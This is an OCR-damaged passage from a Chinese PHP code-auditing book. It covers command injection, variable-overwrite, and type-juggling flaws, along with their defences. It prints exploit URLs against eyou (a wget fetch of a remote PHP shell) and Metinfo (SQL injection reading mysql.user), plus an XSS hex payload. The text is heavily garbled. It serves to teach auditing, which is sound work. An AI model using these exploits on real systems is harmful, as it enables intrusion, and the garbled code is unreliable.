popen () . proc open () 函数 不 会 直接 返回 执行 结果 ， 而 是 返回 一 个 文件 指针 ， 但 命令 是 已 经 执行 了 ， 我 们 主要 关心 的 是 这 个 。 下 面 我 们 看 看 popen () 的 用 法 ， 它 需要 两 个 参数 ， 一 个 是 执行 的 
命令 ， 另 外 一 个 是 指针 文件 的 连接 模式 ， 有 r 和 w 代 表 读 和 写 。 测 试 代码 如 下 : 


«? php 
popen ('whoami >>D: /2.txt', 'r') ;? > 


执行 完成 后 可 以 在 D 盘 根 目录 看 到 2.txt 这 个 文件 ， 内 容 为 WebServer 用 户 名 。 
5.3.1.2 反 引 号 命令 执行 
上 面 我 们 讲 到 反 引 号 C) 也 可 以 执行 命令 ， 它 的 写法 很 简单 ， 实 际 上 反 引 号 C) 执行 命令 是 调用 的 shell_exec () 函数 ， 为 什么 这 么 说 ”我 们 来 看 一 段 简单 的 代码 就 知道 了 ， 代 码 如 下 : 


«? php 
echo ^whoami' ; ? > 


这 段 代码 正常 执行 的 情况 下 是 会 输出 当前 用 户 名 的 ， 而 我 们 在 php.ini 里 面 把 PHP 安 全 模式 打开 一 下 ， 再 重启 下 Webserver 重 新 加 载 PHP 配 置 文件 ， 再 执行 这 段 代码 的 时 候 ， 我 们 会 看 到 下 面 这 个 提示 : 








Warning: shell exec () [function.shell-exec]: Cannot execute using backquotes in Safe Mode in D: \www\test\l.php on line 2 


这 个 提示 说 明 反 引号 执行 命令 的 方式 是 使 用 的 shell_exec () 函数 。 


5.3.1.3 ” 亿 邮 命令 执行 漏洞 分 析 


命令 执行 的 漏洞 案例 还 是 有 很 多 的 ， 这 里 挑选 笔者 自己 挖 到 的 比较 经 典 的 一 个 eyou ( 亿 邮 ) 的 命令 执行 漏洞 ， 重 点 在 于 漏洞 的 逻辑 ， 而 不 在 于 漏洞 的 影响 力 有 多 大 。 


漏洞 利用 在 /swfupload/upload files.php 文 件 ， 代 码 如 下 : 




















<? php 

//-- 获得 UID, DOMAIN, TOKEN 

Suid = $ GET['uid'];  // 从 GET 中 获取 uid 参 数 
Sdomain=$ GET['domain']; // 从 GET 中 获取 domain 参 数 
$token = $ GET['token']; 











SPOST MAX SIZE = ini get ('post max size') ; 
Sunit = strtoupper (substr (SPOST MAX SIZE, -1) ) ; 
Smultiplier = (Sunit == 'M' ? 1048576 : (Sunit == 'K' ? 1024 : (Sunit == 'G' ? 1073741824 : 1))) ; 
if ( (int) $ SERVER['CONTENT LENGTH'] > Smultiplier* (int) SPOST MAX SIZE && SPOST MAX SIZE) { 
header ("HTTP/1.1 500 Internal Server Error") ; SEDE un 
echo "POST exceeded maximum allowed size."; 

































































exit (0) ; 
} 
//-- 获得 附件 存放 路 径 存在 用 户 的 token 目 录 下 
$save path = getUserDirPath ($uid, $domain) ;  // 传 入 uigd 参 数 到 getUserDirPath () 函数 


从 代码 中 可 以 看 出 ，$uid=$_GET[uid]; 表示 从 GET 中 获取 uid 参 数 ， 在 下 面 一 点 将 $uid 变 量 传递 到 了 getUserDirPath () 函数 ， 跟 进 该 函数 ， 在 /inc/function.php 文 件 ， 代 码 如 下 : 





function getUserDirPath (Suid, $domain) { 
$cmd = "/var/eyou/sbin/hashid Suid $domain"; 





Spath = `$cmd`; 
Spath = trim ($path) ; 
return Spath; 


该 函数 拼接 了 一 条 命令 : 


$cmd = "/var/eyou/sbin/hashid Suid $domain"; 


可 以 看 到 $uid 和 $domain 变 量 都 是 从 GET 请 求 中 获取 的 ， 最 终 通过 反 引 号 C) 来 执行 ， 所 以 我 们 可 以 直接 注入 命令 ， 最 终 exp 为 : 








/swfupload/upload files.php? uid=|wgetthttp: //www.x.com/1.txt+-0+/var/eyou/apache/htdocs/swfupload/a .php&domain= 


Am rEhttp://www.x.com/1.txt&l|/var/eyou/apache/htdocs/swfupload/a.php X-4ft, 


5.3.2 WERE 


关于 命令 执行 漏洞 的 防范 大 致 有 两 种 方式 : 一 种 是 使 用 PHP 自 带 的 命令 防 注入 函数 ， 包 括 escapeshellcmd () 和 escapeshellarg () , Erhescapeshellemd () 是 过 滤 的 整 条 命令 ， 所 以 它 的 参数 是 
一 整 条 命令 ，escapeshellarg () 函数 则 是 用 来 保证 传 入 命令 执行 函数 里 面 的 参数 确实 是 以 字符 串 参 数 形式 存在 的 ， 不 能 被 注入 。 除 了 使 用 这 两 个 函数 ， 还 有 对 命令 执行 函数 的 参数 做 白 名 单 限制 ， 下 面 我 
们 来 详细 介绍 。 


5.3.2.1 ”命令 防 注入 函数 


PHP 在 SQL 防 注入 上 有 addslashes () 和 mysq| [real Jescape string () 等 函数 过 滤 SQL 语 句 ， 在 命令 上 也 同样 有 防 注入 函数 ， 一 共有 两 个 escapeshellcmd () 和 escapeshellarg () ， 从 函数 名 我 们 
可 以 看 出 ，escapeshellcmd () 是 过 滤 的 整 条 命令 ， 它 的 函数 说 明 如 下 : 


string escapeshellcmd ( string $command ) 


输入 一 个 string 类 型 的 参数 ， 为 要 过 滤 的 命令 ， 返 回 过 滤 后 的 string 类 型 的 命令 ， 过 滤 的 字符 为 &、; N SN R E P N CNN DA DT SUCUS N OA, NXEF' 
'% ， 和 "仅仅 在 不 成 对 的 时 候 被 转 义 ， 我 们 在 Windows 环 境 测 试 下 ， 测 试 代码 : 


«? php 
echo (escapeshellcemd ($ GET['cmd']) ) ; ?> 








结果 如 图 5-1 2 所 示 。 


可 以 看 到 这 些 字符 过 滤 方 式 是 在 这 些 字符 前 面 加 了 一 个 ^ 符 号 ， 而 在 Linux 下 则 是 在 这 些 字符 前 面 加 了 反 和 斜 杠 (\) 。 


escapeshellarg () 函数 的 功能 则 是 过 滤 参 数 ， 将 参数 限制 在 一 对 双 引 号 里 ， 确 保 参数 为 一 个 字符 串 ， 因 此 它 会 把 双 引 号 蔡 换 为 空格 ， 我 们 来 测试 一 下 : 





«? php 
echo 'ls '.escapeshellarg ('a"') ; ? > 


























«?php 
echo (escapeshellcmd($ GET['cmd'])); 
27> 








“http://localhost/test/1.php2cmd=whoami( 


Split URL 











Execute 


Enable Post data Enable Referrer 













































































whoami ( 





图 5.12 
最 终 输出 为 |s"a" 


5.3.2.2 ”参数 白 名 单 


参数 白 名 单方 式 在 大 多 数 由 于 参数 过 滤 不 严 产生 的 漏洞 中 都 很 好 用 ， 是 一 种 通用 修复 方法 ， 我 们 之 前 已 经 讲 过 ， 可 以 在 代码 中 或 者 配置 文件 中 限定 某 些 参数 ， 在 使 用 的 时 候 匹 配 一 下 这 个 参数 在 不 在 这 
个 日 名 单列 表 中 ， 如 果 不 在 则 直接 显示 错误 提示 即 可 ， 具 体 的 实施 代码 这 里 不 再 重复 。 


Om ”漏洞 抛 掘 与 防区 (深入 篇 ) 


在 学 习 完 基础 篇 和 进 阶 篇 之 后 ， 你 是 否 对 代码 审计 有 了 相对 透彻 的 了 解 呢 ? 相信 现在 挖掘 一 些 常见 漏洞 对 你 来 说 已 经 so easy， 那 么 我 们 将 开始 进入 下 一 阶段 “深入 篇 ”。 在 本 章 ， 我 们 会 介绍 更 多 PHP 
特性 相关 的 漏洞 ， 另 外 对 于 有 逻辑 的 漏洞 也 会 在 这 篇 开始 介绍 ， 是 否 准备 好 了 呢 ? 


6.1 ”变量 禾 兰 漏洞 
变量 覆盖 指 的 是 可 以 用 我 们 自 定义 的 参数 值 蔡 换 程序 原 有 的 变量 值 ， 变 量 履 盖 漏 洞 通 党 需要 结合 程序 的 其 他 功能 来 实现 完整 攻击 ， 这 个 漏洞 想象 空间 非常 大 ， 比 如 原本 一 个 文件 上 传 页 面 ， 限 制 的 文件 
扩展 名 白 名 单列 表 写 在 配置 文件 中 变量 中 ， 但 是 在 上 传 的 过 程 中 有 一 个 变量 覆盖 漏洞 可 以 将 任意 扩展 名 履 盖 掉 原来 的 白 名 单列 表 ， 那 我 们 就 可 以 履 盖 进去 一 个 PHP 的 扩展 名 ， 从 而 上 传 一 个 PHP 的 shell。 


变量 覆盖 漏洞 大 多 由 滔 数 使 用 不 当 导致 ， 经 常 引 发 变量 覆盖 漏洞 的 滔 数 有 : extract () 函数 和 parse str () , import request variables () 函数 则 是 用 在 没有 开启 全 局 变量 注册 的 时 候 ， 调 用 了 这 个 
函数 则 相当 于 开启 了 全 局 变量 注册 ， 在 PHP 5.4 之 后 这 个 遂 数 已 经 被 取消 。 另 外 部 分 应 用 利用 $$ 的 方式 注册 变量 没 验 证 已 有 变量 导致 覆盖 也 是 国内 多 套 程序 都 犯 过 的 一 个 问题 ， 这 些 应 用 在 使 用 外 部 传递 进 
来 的 参数 时 不 是 用 类 似 于 $ GET['key'] 这 样 原始 的 数组 变量 ， 而 是 把 里 面 的 key 注 册 成 了 一 个 变量 $key， 注 册 过 程 中 由 于 没有 验证 该 变量 是 否 已 经 存在 就 直接 赋值 ， 所 以 导致 已 有 的 变量 值 会 被 覆盖 掉 。 


6.1.1 ”挖掘 经 验 


由 于 变量 覆 凑 漏 洞 通常 要 结合 应 用 其 他 功能 代码 来 实现 完整 攻击 ， 所 以 挖掘 一 个 可 用 的 变量 覆盖 漏洞 不 仅仅 要 考虑 的 是 能 够 实现 变量 覆盖 ， 还 要 考虑 后 面 的 代码 能 不 能 让 这 个 漏洞 利用 起 来 。 要 挖 可 用 
9 变量 覆盖 漏洞 ， 一 定 要 看 漏洞 代码 行 之 前 存在 哪些 变量 可 以 履 盖 并 且 后 面 有 被 使 用 到 。 


由 函数 导致 的 变量 覆盖 比较 好 挖掘 ， 只 要 搜寻 参数 带 有 变量 的 extract () . parse str () 函数 ， 然 后 去 回溯 变量 是 否 可 控 ，extract () 还 要 考虑 它 的 第 二 个 参数 ， 具 体 细节 我 们 后 面 在 详细 介绍 这 个 
函数 的 时 候 再 讲 。import request variables () 函数 则 相当 于 开 了 全 局 变量 注册 ， 这 时 候 只 要 找 哪些 变量 没有 初始 化 并 且 操 作 之 前 没有 赋值 的 ， 然 后 就 大 胆 地 去 提交 这 个 变量 作为 参数 吧 ， 另 外 只 要 写 在 
import request variables () 函数 前 面 的 变量 ， 不 管 是 否 已 经 初始 化 都 可 以 覆盖 ， 不 过 这 个 函数 在 PHP 4~4.1.0 和 PHP 5~ 5.4.0 的 版 本 可 用 。 


关于 上 面 我 们 说 到 国内 很 多 程序 使 用 双 $$ 符 号 注册 变量 会 导致 变量 覆盖 ， 我 们 可 以 通过 搜 “$$” 这 个 关键 字 去 挖掘 ， 不 过 建议 挖掘 之 前 还 是 先 把 几 个 核心 文件 通读 一 遍 ， 了 解 程序 的 大 致 框架 。 


6.1.1.1 ”函数 使 用 不 当 


qn 


AAS Sem mAAS BP EE RAPA ILS SU, iuge extract () . parse str () 以 及 import request variables () ， 而 其 中 最 常见 的 就 是 extract () 这 个 函数 了 ， 使 用 频率 最 高 ， 
致 的 漏洞 数量 也 最 多 ， 下 面 我 们 分 别 来 看 看 这 几 个 函数 导致 的 漏洞 原理 吧 。 


1.extract 国 数 


extract () 遂 数 覆盖 变量 需要 一 定 条 件 ， 它 的 官方 功能 说 明 为 “从 数组 中 将 变量 导入 到 当前 的 符号 表 ”， 通 俗 讲 就 是 将 数组 中 的 键 值 对 注册 成 变量 ， 函 数 结构 如 下 : 


int extract ( array &$var array [, int Sextract type = EXTR OVERWRITE [, 
string Sprefix = NULL ]] ) 





最 多 三 个 参数 ， 我 们 来 看 看 这 三 个 参数 的 作用 ， 参 见 表 6-1。 


参 数 HA 述 
var array 必需 。 规 定 要 使 用 的 输 人 


H|it. extract() 图 效 将 检查 每 个 键 名 是 否 为 合法 的 变量 名 ， 辐 时 也 检查 和 符号 表 中 的 变量 


对 非法 、 数 字 和 冲突 的 键 名 的 处 理 将 根据 此 参数 决定 。 可 以 是 以 下 值 之 
可 能 的 值 : 

O EXTR OVERWRITE - W., WRA WR, MERCANTE 

O EXTR _ SKIP - AIR 3E, AOA AY ee 

Q EXTR PREFIX SAME - 如 过 有 冲突 ， 在 变量 名 前 加 上 前 级 prefix 
口 

口 

口 


EXTR PREFIX ALL - 给 所 有 变量 名 加 上 前 级 prefix 
EXTR PREFIX INVALID - 仅 在 非法 或 数字 变量 名 前 加 上 前 级 prefix. 
EXTR IF EXISTS - 仅 在 当前 符号 表 中 已 有 同名 变量 时 ， 材 盖 它 们 的 值 
处 理 

口 EXTR PREFIX IF EXISTS - 仅 在 当前 符号 表 中 已 有 同名 变量 时 ， 建 立 附 加 了 前 缀 的 变量 名 ， 
其 他 的 都 不 处 理 。 


extract type 


yu 
a | 


E FDA 


口 EXTR_ REFS - 将 变量 作为 引用 ， 这 有 力 地 表明 了 守信 的 变量 仍然 引用 了 var muy 
参 效 的 人 全。 可 以 单独 使 用 这 apre 在 extract type 中 用 OR 与 其 他 任何 标志 结合 
使 用 


可 选 。 请 注意 prefix 仅 在 extract type 的 值 是 EXTR. PREFIX SAME, EXTR PREFIX ALL, 
EXTR PREFIX INVALID 或 EXTR PREFIX IF EXISTS HAR. WRM Y Biss ARA 
是 合 5 的 又 变量 名 ， 将 不 会 导 人 到 符号 表 中 。 

前 缀 和 数组 键 名 之 间 会 自动 加 上 一 个 下 划 线 


prefix 


从 以 上 说 明 我 们 可 以 看 到 第 一 个 参数 是 必须 的 ， 会 不 会 导致 变量 覆盖 漏洞 由 第 二 个 参数 决定 ， 该 函数 有 三 种 情况 会 覆盖 掉 已 有 变量 ， 第 一 种 是 第 二 个 参数 为 EXTR_OVERWRITE， 它 表示 如 果 有 冲突 ， 则 
覆盖 已 有 的 变量 。 第 二 种 情况 是 只 传 入 第 一 个 参数 ， 这 时 候 默 认为 EXTR_OVERWRITE 模 式 ， 而 第 三 种 则 是 第 二 个 参数 为 EXTR_IF_EXISTS9， 它 表示 仅 在 当前 符号 表 中 已 有 同名 变量 时 ， 履 盖 它 们 的 值 ， 其 他 
的 都 不 注册 新 变量 


为 了 更 清楚 地 了 解 它 的 用 法 ， 我 们 来 用 代码 来 说 明 ， 测 试 代码 如 下 : 


<? php 

Sb=3; 

Sa-array ('b'=>'1') ; 
extract ($a) ; 
print r (Sb) ; ? > 


测试 结果 如 图 6-1 所 示 。 


«? php 
Sb=3; g du http://localhost/test/1.php 


Sa=array('b'=>'1'); 
extract (Sa) 

print r($b) 

ro. 





原本 变量 $b 的 值 为 3， 经 过 extract () 函数 对 变量 $a 处 理 后 ， 变 量 $b 的 值 被 成 功 覆盖 为 了 1。 


2.parse_str 国 数 


parse str () 函数 的 作用 是 解析 字符 串 并 且 注 册 成 变量 ， 它 在 注册 变量 之 前 不 会 验证 当前 变量 是 否 已 经 存 仁 ， 所 以 会 直接 履 盖 掉 已 有 变量 。parse_str () 函数 有 两 个 参数 ， 函 数 说 明 如 下 : 


void parse str ( string $str [, array &$arr ] ) 





其 中 9str 是 必须 的 ， 代 表 要 解析 注册 成 变量 的 字符 串 ， 形 式 为 “a=1”,， 经 过 parse_str () ANCES E $a HHE. Bo TAX are WA, S498 — P ESCEGERI, TEBBRUSEEE AURI 
这 个 数组 里 面 ， 但 是 如 这 个 数组 原来 就 存在 相同 的 键 (key) ， 则 会 覆盖 掉 原 有 的 键 值 。 


我 们 来 测试 一 下 ， 测 试 代码 : 


«? php 

95-13 

parse str ('b-2') ; 
print r ($b) ; ? > 





测试 结果 可 以 看 到 变量 $b 原 有 的 值 1 被 覆盖 成 了 2， 如 图 6-2 所 示 。 


ol E B p. csal|é KH acer. 
— | 四 中 | fn f @ localhost/test/1.php 


^. F 
s e a 


<?php [INT -| = 6 SQl- XSS- Encryption 
Sb=] F w LoadURL  http;//localhost/test/1.php 


| 
s 


parse str('b-2');]|à splituR. 
print r(5b); ©) Execute 


22 


Enable Post data Eri 





3.import request variables 函 数 
import request variables () 函数 作用 是 把 GET、POST、COOKIE 的 参数 注册 成 变量 ， 用 在 register globals 被 禁止 的 时 候 ， 需 要 PHP 4.1 至 5.4 之 间 的 版 本 ， 不 过 建议 是 不 开启 register_globals 也 不 
要 使 用 import_request variables () 函数 ， 这 样 容易 导致 变量 覆盖 。 该 国 数 的 说 明 如 下 : 





bool import request variables ( string $types [, string $prefix ] ) 


其 中 $type 代 表 要 注册 的 变量 ，G 代 表 GET，P 代 表 POST，(C 代 表 COOKIE， 所 以 当 $type 为 GPC 的 时 候 ， 则 会 注册 GET、POST、COOKIE 参 数 为 变量 。 第 二 个 参数 $prefix 为 要 注册 的 变量 前 级， 这 里 我 
们 不 细 说 ， 来 看 看 它 是 怎么 覆盖 变量 的 ， 测 试 代码 如 下 : 





«? php 

Sb=1; 

import request variables ('GP') ; 
print r ($b) ; ? > 





从 测试 结果 我 们 可 以 看 到 变量 $b 的 值 1 被 覆盖 成 了 2， 如 图 6-3 所 示 。 


| @ localhost/test/1.php?b-2 





<?php d T *| = @ SQL- XSS- Encryptiom 
Sb=1; © Load URL  http//localhost/test/1.php?b-2 


import request variables('GP') , Split URL 


print r($b); Execute 


? Enable Post data Enable 





6.1.1.2 ”$$ 变量 覆盖 


曾经 有 一 段 很 经 典 的 $$ 注册 变量 导致 变量 覆盖 的 代码 ， 在 很 多 应 用 上 面 都 出 现 过 这 个 问题 ， 这 上段 代码 如 下 : 





foreach (array (' COOKIE', ' POST', ' GET') as $ request) { 


foreach ($$ request as $ key => $ value) { 
$$ key = addslashes ($ value) ; 











} 
} 


为 什么 它 会 导致 变量 覆盖 呢 ， 重 点 在 $$ 符 号 ， 从 代码 中 我 们 可 以 看 出 $ key 为 COOKIE、POST、GET 中 的 参数 ， 比 如 提交 ? a=1， 则 $key 的 值 为 a， 而 还 有 一 个 $ 在 a 的 前 面 ， 结 合 起 来 则 是 
$a-addslashes ($ value) ; 所 以 这 样 会 覆盖 已 有 的 变量 $a 的 值 ， 我 们 用 代码 来 解释 会 更 清楚 ， 代 码 如 下 : 


<? php 
$a-1; 
foreach (array (' COOKIE', ' POST', ' GET') as $ request) { 
foreach ($$ request as $ key => $ value) { 
echo $ key.'«br />'; u 
$$ key = addslashes ($ value) ; 








} 
} 


echo $a; ? > 





这 段 代 码 的 执行 结果 如 图 6-4 所 示 。 从 执行 结果 可 以 看 出 我 们 成 功 把 变量 9a 的 值 覆盖 成 了 “2”。 


<?php 
»a-1; 
iforeach (array(' COOKIE', ' POST", ' GET'] as 5 request) 
foreach($$ request as $ key => $ value) { 
echo $ key.'«br /»'; 
$5 key = @dslashes($ value); 


» e || B+ Google 


























6.1.1.3 Metinfo 变 量 履 盖 漏 洞 分 析 


由 于 之 前 笔者 挖 到 的 这 类 漏洞 没有 记录 ， 所 以 这 里 的 案例 是 笔者 临时 看 了 一 下 metinfo 的 代码 找 的 ， 我 们 尝试 用 它 的 变量 覆盖 漏洞 进行 SQL 注 入 ， 在 metinfo 的 include/common.inc.php 文 件 中 代码 如 
下 : 


<? php 

JB 略 关 大 大 大 大 天/ 

$db settings = parse ini file (ROOTPATH.'config/config db.php') ; 
@extract ($db settings) ; i 
//require once ROOTPATH.'config/tablepre.php'; 

require once ROOTPATH.'include/mysql class.php'; 

















Sdb = new dbmysql () ; 

Sdb->dbconn ($con db host, $con db id, $con db pass, $con db name) ; 

define ('MAGIC QUOTES GPC', get magic quotes gpc () ) ; | 

isset ($ REQUEST['GLOBALS']) && exit ('Access Error') ; 

require once ROOTPATH.'include/global.func.php'; 

foreach (array (' COOKIE', ' POST', ' GET') as $ request) { foreach ($$ request as $ key => $ value) { $ key{0} ! = ' ' && $$ key = daddslashes ($ value) ; } 
} 
Squery="select * from {$tablepre}config where name-'met tablename' and lang-'metinfo'"; 
$mettable-$db-»get one ($query) ; 

Smettables=explode ('|', Smettable[value]) ; 

foreach ($mettables as $key=>$val) ( S$tablename-'met '.$val; SStablename=Stablepre.$val; 
} 



























































REE mA DAMS T : 











foreach (array (' COOKIE', ' POST', ' GET') as $ request) { 
foreach ($$ request as $ key => $ value) { 
$ key{0} ! = ' ' && $$ key = daddslashes ($ value) ; 


} 





这 就 是 上 面 我 们 据 介 绍 过 的 $$ 变量 覆盖 的 经 典 代码 ， 在 这 段 代码 之 前 的 变量 ， 我 们 都 可 以 覆盖 掉 ， 包 括 数据 库 配 置 ， 这 样 就 能 搭建 远程 数据 库 服 务 以 登录 后 人 台 ， 不 过 我 们 只 是 为 了 说 明 这 个 漏洞 ， 所 以 
不 搞 那 么 复杂 ， 可 以 看 到 下 面 有 一 个 SQL 语 句 中 使 用 了 $tablepre 变 量 : 











Squery="select * from {$tablepre}config where name-'met tablename' and lang-'metinfo'"; 








这 里 我 们 只 要 覆盖 这 个 变量 即 可 进行 SQL 注 入 。 举 例 一 个 exp 为 : 





/include/common.inc.php? tablepre-mysql.user limit 1 £23 


则 执行 的 SQL 语句 为 : 











select * from mysql.user limit 1 #config where name-'met tablename' and lang-'metinfo' 








我 们 在 以 上 代码 的 最 后 加 上 : 


echo $tablepre.'«br/»'; 
print r ($mettable) ; 
exit 





输出 的 执行 结果 已 确认 覆盖 掉 并 且 注 入 了 SQL 语 句 ， 请 求 结果 证 实 确实 成 功利 用 ， 如 图 6-5 所 示 。 


T| = @ SQL- XSS- Encryption- Encoding: Other- 


Load URL — http:;//localhost/Metinfo5.0/include/common.inc.php?tablepre-mysql.user limit 1 9623 


Split URL 
Execute 
[| Enable Post data | | Enable Referrer 


mysql. user limit 1 # 

Array ( [Host] => localhost [User] => root [Password] => *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 LS 
[Shutdown priv] => Y [Process priv] => Y [File priv] => Y [Grant priv] => Y [References priv] => Y [I 
[Execute priv] => Y [Repl slave priv] => Y [Repl client priv] => Y [Create view priv] => Y [Show view 
[Create tablespace priv] => Y [ssl type] => [ssl cipher] => [x509 issuer] => [x509 subject] => [max a 





6.1.2 漏洞 防范 


变量 覆盖 漏洞 最 常见 漏洞 点 是 在 做 变量 注册 时 没有 验证 变量 是 否 存在 ， 以 及 在 赋值 给 变量 的 时 候 ， 所 以 我 们 推荐 使 用 原始 的 变量 数组 ， 如 $_ GET、$_POST， 或 者 在 注册 变量 前 一 定 要 验证 变量 是 否 存 
在 。 


6.1.2.1 使 用 原始 变量 


以 上 我 们 说 的 变量 覆盖 漏洞 都 是 因为 在 进行 变量 注册 而 导致 ， 所 以 要 解决 变量 覆盖 的 问题 ， 最 直接 的 方法 就 是 不 进行 变量 注册 ， 建 议 直 接 用 原生 的 $ GET、$_POST 等 数组 变量 进行 操作 ， 如 果 考 虑 程序 
可 读 性 等 原因 ， 需 要 注册 个 别 变量 ， 可 以 直接 在 代码 中 定义 变量 ， 然 后 再 把 请 求 中 的 值 赋值 给 它 。 


6.1.2.2 ”验证 变量 存在 


如 果 一 定 要 使 用 前 面 几 种 方式 注册 变量 ， 为 了 解决 变量 覆盖 的 问题 ， 可 以 在 注册 变量 前 先 判 断 变量 是 否 存在 ， 如 使 用 extract () 函数 则 可 以 配置 第 二 个 参数 为 EXTR_SKIP。 使 用 parse_str () 函数 注册 
变量 前 需要 先 自 行 通过 代码 判断 变量 是 否 存在 。 笔 者 不 建议 使 用 mport_request_variables () 函数 注册 全 局 变量 ， 会 导致 变量 不 可 控 。 最 重要 的 一 点 ， 自 行 申明 的 变量 一 定 要 初始 化 ， 不 然 即使 注册 变量 
代码 在 执行 流程 最 前 面 也 能 覆盖 掉 这 些 未 初始 化 的 变量 。 


6.2 ”逻辑 处 理 漏洞 


广义 上 来 说 ， 大 多 数 的 漏洞 都 是 由 于 程序 的 逻辑 失误 导致 的 ， 都 可 以 叫做 逻辑 漏洞 ， 但 我 们 这 里 说 的 逻辑 漏洞 没有 那么 大 范围 ， 这 里 指 程序 在 业务 逻辑 上 面 的 漏洞 ， 业 务 逻 辑 漏洞 也 是 一 个 不 小 的 范 
围 ， 在 不 同 的 业务 场景 有 不 同 的 漏洞 出 现 ， 目 前 逻辑 漏洞 是 各 大 企业 存在 最 多 的 漏洞 之 一 ， 因 为 逻辑 漏洞 在 挖 握 和 利用 时 都 需要 进行 一 些 逻 辑 判 断 ， 机 器 代码 很 难 模拟 这 块 的 逻辑 处 理 ， 所 以 无 法 用 机 器 批 


量化 扫 拉 检测， 检测 的 少 了 ， 现 存 的 漏洞 自然 就 多 了 。 下 面 我 们 从 代码 层 逻辑 错误 导致 的 漏洞 开始 分 析 ， 再 到 应 用 业务 层 常见 漏洞 分 析 ， 如 支付 、 找 回 密码 、 程 序 安装 等 。 


6.2.1 ”挖掘 经 验 


由 于 业务 逻辑 漏洞 大 多 都 存在 逻辑 处 理 以 及 业务 流程 中 ， 没 有 特别 明显 的 关键 字 可 以 用 来 快速 定位 ， 通 常 这 类 漏洞 的 挖掘 技巧 是 通读 功能 点 源码 ， 先 熟悉 这 套 程序 的 业务 流程 ， 后 面 挖掘 起 来 就 会 比较 
顺畅 ， 值 得 关注 的 点 是 程序 是 否 可 重复 安装 、 修 改 密码 处 是 否 可 越权 修改 其 他 用 户 密码 、 找 回 密码 验证 码 是 否 可 暴力 破解 以 及 修改 其 他 用 户 密码 、cookie 是 否 可 预测 或 者 说 cookie 验 证 是 否 可 绕 过 等 等 。 


6.2.1.1 等 于 与 存在 判断 绕 过 


在 逻辑 漏洞 里 ， 判 断 函 数 是 非常 典型 的 一 个 例子 ， 明 明 学 校 老师 教 的， 还 有 官方 手册 里 面 写 的 ， 都 说 某 某国 数 在 某 某 情况 下 会 返回 true， 另 外 一 种 情况 下 会 返回 false， 但 是 一 旦 这 些 函 数 存在 漏洞 ， 可 
以 逃逸 这 个 判断 函数 ， 那 这 个 逻辑 就 可 以 绕 过 了 ， 下 面 我 们 来 看 看 有 哪些 常见 又 有 漏洞 的 判断 函数 。 


1.in array&gZi 


in array () 函数 是 用 来 判断 一 个 值 是 否 在 某 一 个 数组 列表 里 面 ， 通 常 的 判断 方式 如 下 : 





in array ('b', array ('a', 'b', Se") ) 


这 样 是 没有 什么 问题 的 ， 我 们 再 看 下 面 这 段 代 码 : 


«? php 
if (in array ( $ GET['typeid'], array (1, 2, 3, 4) )) 
{ 








$sgl-"select http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/15497/OEBPS/Text/..http://www.hzcourse.com/resource/readBook?path-/ope 
echo $sql; 











这 段 代 码 的 作用 是 过 滤 GET 参 数 typeid 在 不 在 1，2，3，4 这 个 数组 里 面 ， 如 果 在 里 面 则 拼接 到 SQL 语句 里 ， 看 起 来 好 像 是 没有 什么 问题 的 ， 但 是 这 个 in_array () 函数 存在 一 个 问题 ， 比 较 之 前 会 自动 做 
类 型 转换 ， 如 果 我 们 请 求 /1.php? typeid=1'union selecthttp://www.hzcourse.com/resource/readBook?path z/openresources/teach ebook/uncompressed/15497/OEBPS/Text/...， 我 们 看 看 最 终 


输出 的 SQL 语句 是 什么 ， 如 图 6-6 所 示 。 


)) 


$sql-"select - . — where typeid='".$ GET['Ltypsid']."'"; 
echo $sql; 


f File Edit View History Bookmarks Tools Help 
http://localhost.. .3620select9520... 


e j & localhost/test/1.php?typeid- 1' union select ... 


select .... where typeid='1' union select ...' 





图 6-6 
可 以 看 到 我 们 提交 的 typeid 参 数 并 不 全 等 于 1，2，3，4 数 组 里 面 的 任何 一 个 值 ， 但 是 ， 还 是 可 以 绕 过 这 个 检查 并 且 成 功 注入 。 
2.is numericeRgZg 


is numeric () 函数 用 来 判断 一 个 变量 是 否 为 数字 ， 如 果 检 查 通 过 则 返回 true， 否 则 返回 false， 我 们 来 看 如 下 这 段 代 码 : 





«? php 
if (is numeric ($ GET['var']) ) 


{ 





Ssql="insert into xx values ('xx', ($ GET['var']}) " 
echo $sql; 
} 





代码 看 起 来 好 像 也 没有 什么 问题 ， 不 过 这 个 函数 存在 一 个 问题 ， 当 传 入 的 参数 为 hex 时 则 直接 通过 并 返回 true， 而 MySQL 是 可 以 直接 使 用 hex 编 码 代 蔷 字符 串 明 文 的 ， 所 以 这 块 虽然 不 能 直接 注入 SQL 语 
句 ， 但 是 存在 二 次 注入 和 Xss 等 漏洞 隐患 ， 比 如 当 我 们 提交 “<script>alert (1) </scipt>” 的 hex 编 码 “0x3c7363726970743e616c6572742831293c2f73636970743e” 时 ， 最 终 SQL 语 句 的 效果 等 同 


insert into xx values ('xx', '<script>alert (1) </scipt>') 





如 果 应 用 程序 有 其 他 地 方 调用 这 个 值 ， 并 且 直 接 输 出 ， 则 有 可 能 执行 这 段 代 码 ， 触 发 XSS 漏 洞 。 
3. 双 等 于 和 三 等 于 


PHP 的 双 等 于 (==) 和 三 等 于 (===) 的 区 别 ， 哪 一 个 可 能 出 现 安 全 问题 ? 这 个 问题 是 我 经 常 在 面试 的 时 候 提 到 ， 它 们 的 区 别 在 于 ， 双 等 于 在 判断 等 于 之 前 会 先 做 变量 类 型 转换 ， 而 三 等 于 则 不 会 ， 
由 于 数据 类 型 被 改变 ， 所 以 双 等 于 在 判断 的 时 候 可 能 存在 安全 风险 ， 下 面 我 们 用 代码 来 证 明 一 下 ， 代 码 如 下 : 


<? php 
var dump ($ GET['var']==2) ; 





当 我 们 请 求 /1.php? var=2aaa 时 ， 如 图 6-7 所 示 。 


| a EE : 


File Edit View Bookmarks Tools 





图 6-7 
输出 结果 为 true， 请 求 /1.php?”var=3aaa 时 输出 结果 为 false， 说 明 判 断 之 前 成 功 完 成 了 变量 类 型 转换 ， 这 里 跟 上 面 我 们 说 的 in_array () 函数 是 一 样 的 道理 。 
我 们 再 来 测试 三 等 于 (===) ， 代 码 如 下 : 


«? php 
var dump ($ GET['var']---2) ; 











当 我 们 再 次 提交 /1.php? var=2aaa 时 ， 此 时 返回 为 false， 说 明 这 里 没有 进行 类 型 转换 ， 如 图 6-8 所 示 。 








6.2.1.2 ”账户 体系 中 的 越权 漏洞 


